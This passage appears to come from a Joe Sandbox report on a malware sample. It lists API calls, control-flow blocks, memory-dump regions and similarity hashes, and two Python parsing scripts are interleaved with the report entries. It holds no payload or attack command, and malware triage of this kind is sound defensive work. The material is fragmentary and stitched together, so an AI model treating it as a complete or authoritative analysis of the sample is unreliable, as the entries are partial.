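• CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
• SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
"""

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        owner = f" (in sub_{c.subcall:X})" if c.subcall else ""
        print(f"{c.ref:08X} {c.api}{owner}: {c.real_args} {annotate(c)}")
```

Extending the script to another function entry means adding the API's parameter count to ARITY (without it every printed slot is treated as an argument) and, where a parameter is a flag word or enum, a decoder to DECODERS. The ARITY cut-off matters for triage: a reviewer who reads the twelve CreateDirectoryW slots as arguments will chase values that belong to the caller's frame.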

Control-flow Graph (basic blocks as address ranges, the calls each block makes, and its successor blocks)

• 1308: 404a44-404a62, call 408676 (??2@YAPAXI@Z) → 1311, 1312
• 1311: 404a64-404a6b, call 40a9f8 → 1314
• 1312: 404a6d → 1314
• 1314: 404a6f-404a91, call 408726, call 40dcfb → 1341, 1342
• 1341: 404a92, call 40b2fc → 1319
• 1342: 404a92, call 40a7de → 1319
• 1319: 404a95-404a97 → 1320, 1321
• 1320: 404ab3-404abd → 1323, 1324
• 1321: 404a99-404aa9, call 407776 → 1337
• 1323: 404ada-404ae4, ??2@YAPAXI@Z → 1325, 1326
• 1324: 404abf-404ac1, call 403354 → 1331
• 1325: 404ae6-404aed, call 404292 → 1330
• 1326: 404aef → 1330
• 1330: 404af1-404af6, call 40150b → 1336
• 1331: 404ac6-404ac9 → 1323, 1335
• 1335: 404acb → 1338
• 1336: 404afb-404afd → 1338
• 1337: 404aae-404ab2 (no successors listed)
• 1338: 404ad0-404ad8 → 1337
APIs
• ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,0000000E,?,00405D20,?,00417788,00417788), ref: 00404A5A
• ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@
• String ID: ExecuteFile
• API String ID: 1033339047-323923146
• Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
• Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
• Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
• Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

Control-flow Graph (basic blocks as address ranges, the calls each block makes, and its successor blocks)

• 1343: 40adc3-40adce → 1344, 1345
• 1344: 40add0-40add3 → 1346, 1347
• 1345: 40ae0d-40ae0f (no successors listed)
• 1346: 40add5-40ade3, ??2@YAPAXI@Z → 1348, 1349
• 1347: 40adfb → 1348
• 1348: 40adfd-40ae0c, ??3@YAXPAX@Z → 1345
• 1349: 40ade5-40ade7 → 1350, 1351
• 1350: 40ade9 → 1351
• 1351: 40adeb-40adf9, memmove → 1348
APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
• memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@??3@memmove
• String ID:
• API String ID: 3828600508-0
• Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
• Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
• Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
• Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
APIs
• GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
• Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
• Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
• Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
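The per-function API lines above follow a fixed layout (`Name.Module(args), ref: call-site`, with `?` for arguments the plugin could not resolve and resolved string pointers rendered inline, as `ExecuteFile` is), and the `.sdmp` dump names pack PID, snapshot, base address and page protection into dotted hex fields. Reading them by eye across hundreds of entries is error-prone, so the Python below is an added example (not part of the Joe Sandbox report or its IDA plugin) that parses both line kinds into records, decodes the Win32 PAGE_* protection, names the two MSVC-mangled runtime functions, and annotates the `GlobalMemoryStatusEx(00000040)` call: 0x40 is sizeof(MEMORYSTATUSEX), the dwLength the caller must set, and since 0x40 is ASCII `@` it is most likely what the entry above lists under "String ID: @". The sample lines are copied from this page; the field positions inside the `.sdmp` name are an assumption, checked only against the page's own `hcaresult_15_2_400000` snapshot name (PID 0x0F = 15, snapshot 2, base 0x400000) and the protection values matching the code page (0x20) and the writable data page (0x04).

```python
"""Parse the 'APIs' and 'Memory Dump Source' lines of a Joe Sandbox IDA-plugin
function entry into records and attach the notes a triage analyst wants."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

# Constructed input: lines copied from entries on this page, bullets included.
SAMPLE = """
• ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,0000000E,?,00405D20,?,00417788,00417788), ref: 00404A5A
• memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
• GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
"""

# winnt.h page-protection values; one of them sits in the .sdmp name.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# MSVC-mangled C++ runtime names that appear in the API lists.
DEMANGLE = {"??2@YAPAXI@Z": "operator new(unsigned int)",
            "??3@YAXPAX@Z": "operator delete(void *)"}
SIZEOF_MEMORYSTATUSEX = 0x40  # dwLength the caller fills in before GlobalMemoryStatusEx


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Union[int, str, None]]   # int = hex value, str = resolved string, None = '?'
    ref: int                            # call-site address
    subcall_of: Optional[int] = None    # callee address on 'Part of subcall function' lines


@dataclass
class DumpRegion:
    pid: int
    snapshot: int
    base: int
    protect: int
    offset: Optional[int]               # only 'Source File' lines carry an image offset
    based_on_pe: Optional[bool]
    raw: str


API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>\S+?)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
DUMP_RE = re.compile(r"^(?:Source File|Associated): (?P<file>\S+\.sdmp)"
                     r"(?:, Offset: (?P<off>[0-9A-F]+), based on PE: (?P<pe>true|false))?$")


def parse_arg(tok: str) -> Union[int, str, None]:
    """'?' is unresolved; exactly eight hex digits is a value; anything else is a resolved string."""
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_dump_name(name: str) -> Tuple[int, int, int, int]:
    """Field positions are an ASSUMPTION: pid.snapshot.id.base.protect.state.type.x.sdmp.
    pid=0x0F, snapshot=2 and base=0x400000 agree with the page's hcaresult_15_2_400000 file."""
    f = name.split(".")
    return int(f[0], 16), int(f[1], 16), int(f[3], 16), int(f[4], 16)


def parse_entry(text: str) -> Tuple[List[ApiCall], List[DumpRegion]]:
    """Split one function entry into its API calls and memory-dump regions."""
    calls, regions = [], []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if (m := API_RE.match(line)):
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
        elif (m := DUMP_RE.match(line)):
            pid, snap, base, prot = parse_dump_name(m["file"])
            regions.append(DumpRegion(pid, snap, base, prot,
                                      int(m["off"], 16) if m["off"] else None,
                                      (m["pe"] == "true") if m["pe"] else None, m["file"]))
    return calls, regions


def protection_name(p: int) -> str:
    return PAGE_PROTECT.get(p, f"0x{p:X}")


def triage_notes(calls: List[ApiCall]) -> List[str]:
    """Analyst annotations derived from the parsed lines; heuristics, not report verdicts."""
    notes = []
    for c in calls:
        label = DEMANGLE.get(c.name, c.name)
        if c.name == "GlobalMemoryStatusEx" and c.args[:1] == [SIZEOF_MEMORYSTATUSEX]:
            notes.append(f"{c.ref:08X}: {label} with dwLength=0x40 (sizeof MEMORYSTATUSEX); "
                         "0x40 is ASCII '@', likely the report's 'String ID: @'")
        elif c.name == "_CxxThrowException":
            where = f" inside subcall {c.subcall_of:08X}" if c.subcall_of is not None else ""
            notes.append(f"{c.ref:08X}: C++ throw{where}")
        elif c.name in DEMANGLE:
            notes.append(f"{c.ref:08X}: {label}")
    return notes


if __name__ == "__main__":
    api_calls, dump_regions = parse_entry(SAMPLE)
    for r in dump_regions:
        print(f"pid {r.pid} snapshot {r.snapshot} base {r.base:08X} {protection_name(r.protect)}")
    for n in triage_notes(api_calls):
        print(n)
```

Feed `parse_entry` one entry at a time (split the report on the "Joe Sandbox IDA Plugin" marker) so that each call keeps its own dump context; the "Part of subcall" lines are kept as separate records with `subcall_of` set, since they describe the callee rather than the function whose entry they appear in.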
APIs
  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$??2@ExceptionThrowmemmove
• String ID:
• API String ID: 4269121280-0
• Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
• Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
• Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
• Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@H_prolog
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1329742358-0
                                                                                                                                                                                                                                                • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                                                                                                                                                • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
• Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
• Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
• Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
APIs
• ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
• Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
• Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
• Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
APIs
• SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
• GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
• Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
• Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
• Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
APIs
• SysAllocString.OLEAUT32(?), ref: 0040ED05
• _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
Similarity
• API ID: AllocExceptionStringThrow
• String ID:
• API String ID: 3773818493-0
• Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
• Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
• Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
• Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0040E745
• LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
• Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
• Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
• Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                                                                                                • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                                                                                                                                                • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                                                                                                                                                • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3498533004-0
                                                                                                                                                                                                                                                • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                                                                                                                                                • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                                • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                                                                                                                                                • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _beginthreadex.MSVCRT ref: 00406552
                                                                                                                                                                                                                                                  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast_beginthreadex
                                                                                                                                                                                                                                                • String ID:
• API String ID: 4034172046-0
• Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
• Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
• Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
• Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
APIs
Memory Dump Source
